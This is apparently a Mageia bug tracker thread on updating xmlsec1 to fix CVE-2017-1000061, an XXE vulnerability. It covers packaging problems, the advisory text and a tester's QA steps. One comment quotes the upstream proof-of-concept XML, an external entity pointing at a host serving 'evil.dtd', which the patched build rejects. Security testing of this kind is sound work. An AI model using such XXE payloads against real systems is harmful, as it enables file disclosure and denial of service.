Fedora has issued an advisory on February 3: https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/3PWHBRWXR3RNPHDSTQI6UWDG5ETOQ7VR/ The issue is fixed upstream in 1.2.29. Mageia 7 is also affected.
Whiteboard: (none) => MGA7TOO
Done for both Cauldron and mga7!
CC: (none) => geiger.david68210
Advisory: ======================== Updated xmlsec1 packages fix security vulnerability: It was discovered xmlsec1's use of libxml2 inadvertently enabled external entity expansion (XXE) along with validation. An attacker could craft an XML file that would cause xmlsec1 to try and read local files or HTTP/FTP URLs, leading to information disclosure or denial of service (CVE-2017-1000061). References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000061 https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/3PWHBRWXR3RNPHDSTQI6UWDG5ETOQ7VR/ ======================== Updated packages in core/updates_testing: ======================== xmlsec1-1.2.29-1.mga7 libxmlsec1_1-1.2.29-1.mga7 libxmlsec1-openssl1-1.2.29-1.mga7 libxmlsec1-nss1-1.2.29-1.mga7 libxmlsec1-gnutls1-1.2.29-1.mga7 libxmlsec1-gcrypt1-1.2.29-1.mga7 libxmlsec1-devel-1.2.29-1.mga7 from xmlsec1-1.2.29-1.mga7.src.rpm
Whiteboard: MGA7TOO => (none)Assignee: java => qa-bugsVersion: Cauldron => 7
Mageia7, x86_64 Before the update installing the devel package failed with this message: The following packages can't be installed because they depend on packages that are older than the installed ones: lib64xslt-devel-1.1.33-2.1.mga7 lib64xmlsec1-devel-1.2.28-1.mga7 The others install OK. Tried to run the PoC but had difficulties: CVE-2017-1000061 https://github.com/lsh123/xmlsec/issues/43 $ cat input.xml <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://192.168.3.1/evil.dtd"> %remote;]> $ xmlsec1 --verify --output /tmp/output.xml input.xml .... Failed to find xmlsec-openssl library. /usr/lib64/libxmlsec1-openssl.so.1.2.28 is installed. Cannot unravel this. And also, re lib64xmlsec1-devel, removing lib64xslt-devel would take 148 other packages with it. Had hoped to reinstall it to pick up the correct package, assuming that the xslt one is the source of the problem. $ urpmq --requires lib64xmlsec1-devel .... pkgconfig(libxslt)[>= 1.0.20] $ locate libxslt /usr/lib64/libxslt.so.1.1.33 Why is it complaining? Recursive query lists lib64xslt1 $ rpm -qa | grep lib64xslt1 lib64xslt1-1.1.33-2.2.mga7
CC: (none) => tarazed25
Keywords: (none) => feedback
Assignee: qa-bugs => geiger.david68210Keywords: feedback => (none)CC: (none) => qa-bugs
Status comment: (none) => Update built, but CLI tool fails to find its own library
(In reply to Len Lawrence from comment #3) > Failed to find xmlsec-openssl library. > > /usr/lib64/libxmlsec1-openssl.so.1.2.28 is installed. Shouldn't it be /usr/lib64/libxmlsec1-openssl.so.1.2.29 ??
Len, did you ever actually test the update?
No. I was waiting to resolve the missing dependency. It looks like it was never installed so I have installed it now. Don't ask.
@David Geiger: in reply to comment 4 It is all coming back into focus now. It was the before update situation which was the problem. Testing the PoC against the 1.1.28 version failed because the xmlsec-openssl library could not be found even though libxmlsec1-openssl.so.1.2.28 was installed. Why would it complain? I felt uneasy about proceeding with testing in case something was seriously wrong.
It's only a problem if something is wrong with the update.
Assignee: geiger.david68210 => qa-bugsCC: qa-bugs => (none)Status comment: Update built, but CLI tool fails to find its own library => (none)
Continuing from comment 3: Updated the seven packages and ran the PoC. $ xmlsec1 --verify --output /tmp/output.xml input.xml func=xmlSecNoXxeExternalEntityLoader:file=xmlsec.c:line=59:obj=unknown:subj=xmlSecNoXxeExternalEntityLoader:error=5:libxml2 library function failed:illegal external entity='http://192.168.3.1/evil.dtd'; xml error: 0: NULL input.xml:2: parser error : Start tag expected, '<' not found ^ func=xmlSecParseFile:file=parser.c:line=414:obj=unknown:subj=xmlParseDocument:error=5:libxml2 library function failed:filename=input.xml; xml error: 4: Start tag expected, '<' not found Error: failed to parse xml file "input.xml" Error: failed to load document "input.xml" ERROR SignedInfo References (ok/all): 0/0 Manifests References (ok/all): 0/0 Error: failed to verify file "input.xml" This agrees with the upstream test but we have no "before" example to compare it with. That is only half of the test anyway. It needs a server on localhost to listen on port 80. Don't know how to set that up. Not knowing anything about this package it seemed appropriate to use the command from the PoC. Tried a few local XML files but failed every time. $ xmlsec1 --verify --output /tmp/output.xml workspace.xml Error: failed to find default node with name="Signature" Error: failed to load document "workspace.xml" ERROR SignedInfo References (ok/all): 0/0 Manifests References (ok/all): 0/0 Error: failed to verify file "workspace.xml" The help indicates that verify refers to signed documents which these are not. Fiddled with an XML file as data and tried to create a document with a default template signature with the --sign-tmpl option but that fell flat. $ xmlsec1 -output test1.xml --sign-tmpl workspace.xml Need to do more research.
Tried to verify various pem files found in the system. These fail on missing start tag. Looks like these are encrypted certificates. Decrypting does not work. Not making much headway with this. The best I could do was to follow part of the tutorial at https://users.dcc.uchile.cl/~pcamacho/tutorial/web/xmlsec/xmlsec.html. Copied down the files and: $ xmlsec1 --sign --output doc-signed.xml --privkey-pem userkey.pem doc.xml Enter password for "userkey.pem" file: $ ls cacert.pem doc-signed.xml doc.xml pub-userkey.pem usercert.p12 userkey.pem The generated XML file doc-signed.xml corresponded with the example online. $ cat doc-signed.xml <?xml version="1.0"?> <References> <Book> <Author> <FirstName>Bruce</FirstName> <LastName>Schneier</LastName> </Author> <Title>Applied Cryptography</Title> [..] </RSAKeyValue> </KeyValue> </KeyInfo> </Signature> </References> $ xmlsec1 --verify doc-signed.xml OK SignedInfo References (ok/all): 1/1 Manifests References (ok/all): 0/0 Deliberately corrupted the Title and Signature and tried again. $ xmlsec1 --verify doc-signed.xml func=xmlSecOpenSSLEvpDigestVerify:file=digests.c:line=280:obj=sha1:subj=unknown:error=12:invalid data:data and digest do not match FAIL SignedInfo References (ok/all): 0/1 Manifests References (ok/all): 0/0 Error: failed to verify file "doc-signed.xml" $ cp doc.xml doc-id.xml Made a benign change to doc-id.xml, adding an id to the Book node. $ xmlsec1 --sign --output doc-id-signed.xml --privkey-pem userkey.pem doc-id.xml Enter password for "userkey.pem" file: $ ll doc-id-signed.xml $ ll doc-id-signed.xml -rw-r--r-- 1 lcl lcl 1387 Feb 23 20:43 doc-id-signed.xml $ xmlsec1 --verify doc-id-signed.xml OK SignedInfo References (ok/all): 1/1 Manifests References (ok/all): 0/0 There is more, but to avoid getting out of my depth I am sending this on.
Whiteboard: (none) => MGA7-64-OK
Thank you for all your effort, Len. I'm going to go ahead and validate. Advisory in Comment 2.
CC: (none) => andrewsfarm, sysadmin-bugsKeywords: (none) => validated_update
CC: (none) => tmbKeywords: (none) => advisory
An update for this issue has been pushed to the Mageia Updates repository. https://advisories.mageia.org/MGASA-2020-0104.html
Resolution: (none) => FIXEDStatus: NEW => RESOLVED